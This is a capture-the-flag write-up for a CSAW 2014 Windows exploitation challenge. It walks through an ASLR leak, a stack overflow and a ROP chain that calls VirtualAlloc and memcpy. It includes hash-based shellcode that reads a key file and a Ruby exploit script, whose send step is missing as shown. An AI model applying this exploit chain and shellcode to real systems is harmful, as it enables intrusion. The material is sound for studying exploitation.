Posted on by and filed under CSAW 2014.

For this challenge, we’re given an .exe file and a server that it’s running on. Running strings on the binary, we see that there’s a lot of text in the program. It’s all instructions on how to get started with Windows exploitation. One block that is particularly interesting is:

Send me exactly 1024 characters (with some constraints).

So, looking at where this string is used we can see that it’s printed out, and then a function is called that has GetStdHandle and ReadFile inside of it.

[Image: disassembly of the vulnerable function]

I think it’s safe to guess that the 0x800(2048) passed to that function is the amount to read, and that ReadFile is reading from input. Above that call we can see sub esp, 400h which is making only 0x400 bytes of room on the stack… so we have a classic buffer overflow!
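To make the size mismatch concrete, here is a small Ruby sketch of the arithmetic. The constant names are mine; the values are the ones read off the disassembly, and it assumes the 0x800 really is the read length.

```ruby
READ_SIZE  = 0x800 # byte count passed to the function wrapping ReadFile
STACK_ROOM = 0x400 # space reserved by "sub esp, 400h"

# How far past the reserved stack space a full-length read can reach.
overflow = READ_SIZE - STACK_ROOM
puts "a full read can write 0x%x bytes past the reserved stack space" % overflow
```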

One problem though: we don’t know where our buffer is! The problem description said this is a Windows 8.1 challenge, so we have to deal with ASLR and DEP (i.e. the stack is not executable).


So, when running the binary, we get a prompt for a password. Inputting GreenhornSecretPassword!!! works and we get a menu. One of the options is (A)SLR, which prints the address of a variable on the stack as well as the program base address. Two variables on the stack will be the same distance apart from each other on different systems, so we can use this leak to get the address of our vulnerable buffer. Start the binary in a debugger, grab the ASLR printout, and set a breakpoint in the vulnerable function. Subtracting the buffer address seen at the breakpoint from the printed address gives the offset from the ASLR leak to our buffer: inputBuffer = aslrLeak-0x3F8
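As a rough sketch of that calculation in Ruby: the sample line below is the leak message quoted in a comment in the exploit script, and the variable and constant names are my own, not anything from the binary.

```ruby
# Sample leak line, copied from a comment in the exploit script.
leak = "your ASLR slide is: 0x00f40000 and the slide variable is stored at: 0x0106f934."

# The first hex value is the slide, the second is the stack address of the slide variable.
slide, slide_addr = leak.scan(/0x(\h{8})/).flatten.map(&:hex)

BUFFER_DELTA = 0x3F8 # distance measured in the debugger
input_buffer = slide_addr - BUFFER_DELTA

puts "slide        = 0x%08x" % slide
puts "slide var at = 0x%08x" % slide_addr
puts "input buffer = 0x%08x" % input_buffer
```

The 0x3F8 delta only holds for this binary; a different build would need to be measured again.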


That took care of ASLR. But how do we get around DEP? Return Oriented Programming is the answer. On Windows, the flow we need goes like this:

  • VirtualAlloc a section of Readable, Writable, Executable memory to execute from.
  • memcpy our shellcode into this region of memory from wherever our input is
  • call the executable shellcode buffer.


So, using this knowledge, we build a ROP chain. To get started, we need to know where the first return address is on the stack compared to our input buffer. We do this in our debugger by just stepping to the first ret after our input buffer is read in. The return address will be the first value on the stack, and we can subtract that stack address from the address we knew our buffer was at. This gives us inputBuffer+0x402 as our first return address overwrite, and this will be where the ROP chain starts.

The ret will execute, pop the address we put at inputBuffer+0x402 off the stack, and execute at that address. We want to call VirtualAlloc…and a function that just calls VirtualAlloc is in the binary, so on our ROP chain we can put an offset from the base of the program to that.

rop = []

rop << [0xBBBBBBBB].pack("V") # there's a "pop ebp" at the end of our vulnfunc, put this on stack there for that.
rop << [baseaddr+0x1C0].pack("V") # return to virtualalloc! 
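If pack("V") is unfamiliar: it encodes each integer as a 32-bit little-endian value, which is the byte order x86 expects for an address on the stack. A quick sketch, using a made-up base address purely for illustration:

```ruby
baseaddr = 0x00F40000 # example value only; the real one comes from the ASLR leak

entry = [baseaddr + 0x1C0].pack("V") # 32-bit unsigned, little-endian

puts entry.unpack1("H*") # → c001f400 (bytes in the order they land on the stack)
puts entry.bytesize      # → 4
```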

So, we’ve got execution going back to a function that calls VirtualAlloc; now we need to set up its arguments on the stack correctly. ESP is now pointing to the next spot in our ROP chain, and if we look at the VAlloc function we can see that this next spot + 4 is where the first argument is (and the next arguments are after that). Note that there is a push ebp at the beginning of the function that adds a 4-byte value to the stack, which makes the arguments in our ROP chain (that would otherwise start at esp+4) correspond to esp+8 in the assembly.

[Image: disassembly of the VAlloc function]

So, we can make our chain:

rop = []

rop << [0xBBBBBBBB].pack("V") # there's a "pop ebp" at the end of our vulnfunc, put this on stack there for that.
rop << [baseaddr+0x1C0].pack("V") # return to virtualalloc! 
rop << [0x00000000].pack("V") # dunno
rop << [0x00000000].pack("V") # Valloc args - address (null, we don't care where) 
rop << [0x00000900].pack("V") # size - something big is good
rop << [0x00000040].pack("V") # protection flags - read, write, execute
rop << [0].pack("V") # write the RWX buffer address back somewhere :3 - 0 for now

Now, we can step through the function and we’ll see that when it gets to the ret, the value at ESP is our first 0 that didn’t matter to us at the time. This is one of the very important parts of ROP — we need to advance the stack past the values we had to have on the stack for this function call. This will place ESP at the next open spot in our ROP chain.

But how do we do this? Well, we know that 0 we didn’t care about will be the next address to be executed. We know that there’s 16 bytes of data after it that ESP needs to get past. We use something called a ROP gadget to do this. The ROP gadget we need should take 16 bytes off the stack and then return to the first value after that. We can find one at offset 0x99E in the binary:

pop edi
pop esi
pop edx
pop ebp
ret
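To see why four pops line things up, here is a toy Ruby model of the stack at the moment the VirtualAlloc wrapper returns. It models the stack as an array of dwords and ESP as an index; the symbols are placeholders of mine, not real addresses.

```ruby
# Stack contents when the VirtualAlloc wrapper reaches its ret.
stack = [
  :gadget,         # return address: the pop/pop/pop/pop/ret gadget
  0x00000000,      # arg: address
  0x00000900,      # arg: size
  0x00000040,      # arg: protection flags
  0x00000000,      # arg: write-back pointer
  :next_rop_entry  # where we want execution to continue
]

esp = 0
esp += 1               # the wrapper's ret consumes the gadget address
4.times { esp += 1 }   # pop edi / pop esi / pop edx / pop ebp
bytes_skipped = 4 * 4  # four dwords
target = stack[esp]    # the gadget's ret consumes this entry

puts "skipped #{bytes_skipped} bytes, ret goes to #{target}"
```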

Remember our strategy from before? The next thing we need to call after this is memcpy to copy our input buffer into the RWX space. Naturally, the next ROP entry will be the address of a memcpy occurrence in the binary, then a gadget to clean up the stack by 4*number of arguments, then the next function…

But wait! Arguments for memcpy: destination, source, size. The destination should be our RWX buffer…which we don’t know until VAlloc is called. Luckily, the VAlloc function above has a fourth argument that represents an address to write the buffer address to. We can set that argument to ropStart+0x22 to point to a value we’ll leave as 0 when we build our ROP. So, we have:

rop = []

rop << [0xBBBBBBBB].pack("V") # there's a "pop ebp" at the end of our vulnfunc, put this on stack there for that.
rop << [baseaddr+0x1C0].pack("V") # return to virtualalloc! 
rop << [baseaddr+0x99E].pack("V") # gadget - advance by 16 bytes and ret!
rop << [0x00000000].pack("V") # Valloc args - address (null, we don't care where) 
rop << [0x00000900].pack("V") # size - something big is good
rop << [0x00000040].pack("V") # protection flags - read, write, execute
rop << [ropStart+0x22].pack("V") # write the RWX buffer address back to the position in our ROP chain of the memcpy dest argument

rop << [baseaddr+0x1F0].pack("V") # call memcpy(dst,src,sz) 
rop << [baseaddr+0x99E].pack("V") # CLEAN UP 16 bytes again! same gadget as before!

rop << [0x00000000].pack("V")     # dest - Zero, the virtualalloc will overwrite this with the address of the new buffer
rop << [inputbuff].pack("V")      # src - addr of shellcode in the input buffer.
rop << [dontcareSz].pack("V")             # size of shellcode to copy
rop << [0xAAAAAAAA].pack("V")     # garbage val fixup for the add esp, 0xC; pop ebp at the end of the memcpy fn

rop << [baseaddr+0x141].pack("V") # memcpy will ret to me with rwx buff in eax!

This is all there is to the ROP chain! The last entry to it is the address of a gadget that does “call eax” — because, luckily, eax happened to contain the RWX buffer after everything was done and copied.


We have our ROP chain copying the input buffer over and trying to call it. Now we need to give it some valid shellcode. If we look at the vulnfn there is a small restriction, though:

[Image: disassembly of the CSAW buffer check]

Haha, OK, so it wants any of the letters in “CSAW” to occur in the first 4 bytes of the input buffer. We can make that happen:

shellcode =  "V\x90\x6A\x53\x90" 

The V just tells the program to go to the vulnerable function; the input buffer starts after it. The remaining bytes disassemble to:

nop
push 53h
nop

The 53h satisfies the check for an S at index 2 and it passes the checks.
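Here is a hedged Ruby model of that check as I read it from the description: at least one of the first four bytes must be one of C, S, A or W. The helper name is hypothetical and the binary's real logic may be stricter (for example, position-dependent).

```ruby
# Hypothetical helper: true if any of the first four bytes is C, S, A or W.
def passes_csaw_check?(buffer)
  allowed = "CSAW".bytes
  buffer.bytes.first(4).any? { |b| allowed.include?(b) }
end

prefix = "\x90\x6A\x53\x90".b # nop; push 53h; nop
puts passes_csaw_check?(prefix)               # → true (0x53 is "S")
puts passes_csaw_check?("\x90\x90\x90\x90".b) # → false
```

The nice part of push 53h is that the required letter doubles as a harmless instruction operand, so the shellcode can start executing from byte zero.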

Getting into Windows Shellcoding is beyond the scope of this writeup, but the gist of my shellcode is:

  • Get addresses of useful functions from kernel32.dll(CreateFile, ReadFile)
  • Get address of output-to-user function from module base
  • CreateFile “key”
  • ReadFile the handle returned by CreateFile
  • Call the output-to-user fn with the buffer read in.

Do all of this, and we get the flag output back to us.

My shellcode is more than a little hairy, as I store all the useful stuff arbitrarily on the stack without setting the stack up at the beginning like a normal function would. Don’t trust the comments, they might be outdated.

Here it is:


; find kernel32
push byte 0x30
db 0x5e ; pop esi...damnit nasm
db 0x64 ; mov eax, dword [fs:esi] ;[fs:ESI] into eax
db 0x8b ;
db 0x06 ;

mov esi, dword [eax+0xC]
mov esi, dword [esi+0x14]
mov eax, [esi+0x10] ; main.exe
add eax, 0x1000 ; .text
push eax ; store for l8r
;findKernel: ; fuck everything, we know it's: [exe, nt, kernel]
mov esi, dword [esi]
mov esi, dword [esi] ; KERNEL HEADER THING IN ESI!!!! WOW SO HARD
mov edx, dword [esi+0x10]
;jnz findKernel
; EDX contains kernel32 base, find getprocaddress. store exp table in esi, names in edi
push 0x7C0017A5 ; OpenFile hash 0x112704B8 GPA: 0x7C0DFCAA CreateFileA: 0x7C0017A5
push edx
call findSymbolByHash 
;push 0x00747874 ; key.txt
;push 0x2e79656b ; store filename on stack
push 0x0079656b ; key - store filename on stack
;push 0x00000000
;push 0x7478742e
;push 0x67616c66 ; flag.txt 
mov edi, esp    ; store for fn call
push edx ; save edx
push 0          ; templatefile -- null
push 0x80       ; flags -- fileattributenormal
push 3          ; creation disposition - OPEN_EXISTING
push 0          ; security attrb. none
push 0x1        ; arg3 - share - FILE_SHARE_READ
push 0x80000000 ; arg2 - access - GENERIC_READ
push edi        ; arg1 -- filename
call eax        ; createfile ;openfile(name, outbuffofshit, key)
pop edx ; restore edx
mov edi, eax    ; store handle to file :D
push 0x10fa6516 ; readfile hash
push edx
call findSymbolByHash
sub esp, 0x200
mov ecx, esp
push ecx ; store for l8r
push 0 ;junk
push ecx ; writable plz
sub ecx, 0x200 
push 0x200      ; bytes to read
push ecx        ; buffer to read into
push edi        ; "key0" we stored earlier
call eax ; ReadFile
pop ecx ; restore ecx, add 200 to get readin buffer.. then 200 more for main module handle we stored at start
sub ecx, 0x200
add esp, 0x204 ; 0x200 + 0x(num filename pushes)
pop eax        ; main module base
add eax, 0x460 ; +0x460 = write to network conn.
sub esp, 0x40C
push 0x100 ; sz
push ecx ; data
call eax ;41414141 ; call output to stdout fn.. base+0x460
hashString:
  push esi
  push edi
  mov esi, dword [esp+0x0c] ; load function argument in esi
  xor edi, edi
.hash_iter:
  xor eax, eax
  lodsb ; load next byte of input string
  cmp al, ah
  je .hash_done ; check if at end of symbol
  ror edi, 0x0d ; rotate right 13 (0x0d)
  add edi, eax
  jmp near .hash_iter
.hash_done:
  mov eax, edi
  pop edi
  pop esi
  retn 4

findSymbolByHash:
  pushad
  mov ebp, [esp + 0x24] ; load 1st arg: dllBase
  mov eax, [ebp + 0x3c] ; get offset to PE signature
  ; load edx w/ DataDirectories array: assumes PE32
  mov edx, [ebp + eax + 4+20+96]
  add edx, ebp ; edx:= addr IMAGE_EXPORT_DIRECTORY
  mov ecx, [edx + 0x18] ; ecx:= NumberOfNames
  mov ebx, [edx + 0x20] ; ebx:= RVA of AddressOfNames
  add ebx, ebp ; rva->va
.search_loop:
  jecxz .error_done ; if at end of array, jmp to done
  dec ecx ; dec loop counter
  ; esi:= next name, uses ecx*4 because each pointer is 4 bytes
  mov esi, [ebx+ecx*4]
  add esi, ebp ; rva->va
  push esi
  call hashString ; hash the current string
  ; check hash result against arg #2 on stack: symHash
  cmp eax, [esp + 0x28]
  jnz .search_loop
  ; at this point we found the string in AddressOfNames
  mov ebx, [edx+0x24] ; ebx:= ordinal table rva
  add ebx, ebp ; rva->va
  ; turn cx into ordinal from name index.
  ; use ecx*2: each value is 2 bytes
  mov cx, [ebx+ecx*2]
  mov ebx, [edx+0x1c] ; ebx:= RVA of AddressOfFunctions
  add ebx, ebp ; rva->va
  ; eax:= Export function rva. Use ecx*4: each value is 4 bytes
  mov eax, [ebx+ecx*4]
  add eax, ebp ; rva->va
  jmp near .done
.error_done:
  xor eax, eax ; clear eax on error
.done:
  mov [esp + 0x1c], eax ; overwrite eax saved on stack
  popad
  retn 8
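The hashing routine in the assembly (rotate the running hash right by 13 bits, then add the next byte, stopping at the NUL terminator) can be mirrored in Ruby to generate or check the constants pushed before each lookup. This is a sketch with helper names of my own choosing:

```ruby
# Rotate a 32-bit value right by the given number of bits.
def ror32(value, bits)
  ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF
end

# Same scheme as the assembly: ror 13, then add the byte, for every byte of the name.
def ror13_hash(name)
  name.each_byte.reduce(0) do |hash, byte|
    (ror32(hash, 13) + byte) & 0xFFFFFFFF
  end
end

puts "0x%08x" % ror13_hash("CreateFileA") # → 0x7c0017a5, the value pushed in the shellcode
puts "0x%08x" % ror13_hash("ReadFile")
```

Hashing export names this way keeps the shellcode small, since it only has to carry a 4-byte constant per function instead of the full name string.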

And here’s the full ruby script:

require 'socket'
require 'hexdump'

sock = TCPSocket.new("", 9998) # host is blank in the post
#sock = TCPSocket.new("", 4444)

# just some util
class String
  def print(val)
    self.replace(self.to_s.force_encoding("BINARY") + val.force_encoding("BINARY"))#val.unpack("H*").join(""))
  end
end

# read from the socket until the given marker string shows up
def recv_until(socket, str)
  data = ""
  while tmp = socket.recv(1024) and not tmp.empty?
    data += tmp
    if data.include? str
      return data
    end
  end
end

recv_until(sock, "Password:")
puts "[+] Got passwd prompt"
recv_until(sock, "Selection:")
puts "[+] Got selection menu"
# However, this is a greenhorn challenge, so your ASLR slide is: 0x00f40000 and the slide variable is stored at: 0x0106f934.
aslr_leak = recv_until(sock, "Selection:")
#print aslr_leak

leakedSlideAddr = aslr_leak[/0x(........).+0x(........)/,2].hex#0x34F4A4
leakedSlide = aslr_leak[/0x(........).+0x(........)/,1].hex#0x5f0000
puts "[+] Got ASLR val #{"%08x" % leakedSlide} on stack @ #{"%08x" % leakedSlideAddr}"

baseaddr = leakedSlide+0x401000 # stores the address that the program is loaded at -- program subtracted 0x401000 from value printed.
inputbuff =  leakedSlideAddr-0x3F8# stores location of the address on the stack where the input buffer is written
dontcareSz = 0x402 # size of buffer before we start overwriting rop? -- used for virtualalloc and copy...

puts "[+] Program loaded @ 0x#{"%08x" % baseaddr}, input buffer @ 0x#{"%08x" % inputbuff}"
#gets # - pause so we can attach a debugger!
fillme = ""
shellcode =  "V\x90\x6A\x53\x90" +
"\xbe\x30\x3f\x47\x5c\xda\xc7\xd9\x74\x24\xf4\x5f\x2b\xc9" +
"\xb1\x43\x31\x77\x14\x03\x77\x14\x83\xef\xfc\xd2\xca\x2d" +
"\x6c\x4c\x51\x39\x8a\xfb\xe9\x31\x18\x8d\x1d\xc1\x58\x61" +
"\x1b\xd5\x74\x81\x23\x85\xff\xb7\xa8\x13\x8b\xe1\xbe\x33" +
"\x2e\x1a\xbf\xbf\x62\xcc\x28\x3f\x83\x0c\x3f\x2b\xe6\x75" +
"\xbf\x22\x0f\xd7\xd7\x34\xd0\xd7\x27\x5d\x50\xd7\x27\x9d" +
"\x38\xd4\x27\x9d\xb8\xb2\x27\x9d\xb8\x42\x40\x9c\xb8\x42" +
"\x90\xf6\xb8\x42\x90\x86\xee\xbd\x40\xdc\x99\x86\x09\xf7" +
"\xfc\xf2\xda\xa5\x16\x62\xdb\x49\xe7\xe3\x37\x49\xe5\xe3" +
"\xc7\xc3\x08\xb2\xaf\xd3\xca\x34\x30\x85\x4b\xdd\x30\x27" +
"\x4c\x1d\x59\x27\x4e\x1d\x99\x76\x19\xe2\x49\x21\x24\xf5" +
"\x6a\xd0\x26\x05\xea\x10\x22\x07\xec\x98\x73\x02\x8c\x9c" +
"\x83\x0c\xcd\x71\x8f\x08\xcd\x89\xf8\x10\xcc\x89\xf8\x41" +
"\x31\x59\xae\x36\x46\x2e\x6b\xb4\x69\x30\x8f\xf5\x49\x62" +
"\x48\x15\x3d\x71\x68\x1a\xb3\x84\xad\x4d\x23\x79\xce\x72" +
"\x35\x7e\x6e\xd2\x84\x7b\x91\x8a\x83\xe8\xb5\x6e\x1f\xb5" +
"\x89\xe5\x4b\x33\x8a\xf8\x99\xb0\x20\xe2\xd6\x9d\x94\x13" +
"\x02\xc2\xff\x5a\x5f\x31\x8b\x5d\xb1\x6c\x63\xe6\xb2\x6e" +
"\x8c\x23\x09\xb5\x5b\x26\x7d\x3e\xc1\xec\x7c\xaa\x90\x67" +
"\x72\x67\xd6\x2d\x97\x76\x03\x5a\xa3\xf3\xd2\xb4\x45\x01"

puts "[+] shellcode len: #{shellcode.length}"

# ROP plan
# -- valloc RWX space
# -- memcpy shellcode from stack into space
# -- jmp space
# -- profit?
rop = []

rop << [0xBBBBBBBB].pack("V") # "pop ebp" at end, WE DO NOT CAAAAARE
rop << [baseaddr+0x1C0].pack("V") # virtualalloc - 0X400
#rop << [baseaddr+0x1FF].pack("V") # call memcpy(dst,src,sz) - 0X414 -- 0x1FE if we wanted push edx also
rop << [baseaddr+0x99E].pack("V") # ret addr of fn 2 - reduce stack
rop << [0x00000000].pack("V") # addr(null, we don't care where) -  0X404
rop << [0x00000900].pack("V") # sz - 0X408
rop << [0x00000040].pack("V") # prot flags 0X40C
rop << [inputbuff+dontcareSz+0x22].pack("V") # write the RWX buffer back somewhere :3 - 0X410
# eax now contains RWX buffptr
#########rop << # gadget to mov edx, eax
########## RWX buff in edx, let's fucking memcpy!
rop << [baseaddr+0x1F0].pack("V") # call memcpy(dst,src,sz) - 0X414 -- 0x1FE if we wanted push edx also
rop << [baseaddr+0x99E].pack("V") # CLEAN UP 16 DECIMAL FROM THE STACK :DDDDDD

rop << [0x00000000].pack("V")     # Zero, the virtualalloc will overwrite this with the address of the new buffer so we don't need the gadget above! - 0X418
rop << [inputbuff].pack("V")      # shellcode in the input buffer.
rop << [dontcareSz].pack("V")             # size of shellcode to copy

rop << [0xAAAAAAAA].pack("V")     # fixup for the add esp, 0xC; pop ebp at the end of the memcpy block

rop << [baseaddr+0x141].pack("V") # memcpy will ret to me with rwx buff in eax!

rop.each { |e|
#  print e
}

puts "[+] Sent Exploit"
puts sock.recv(1024)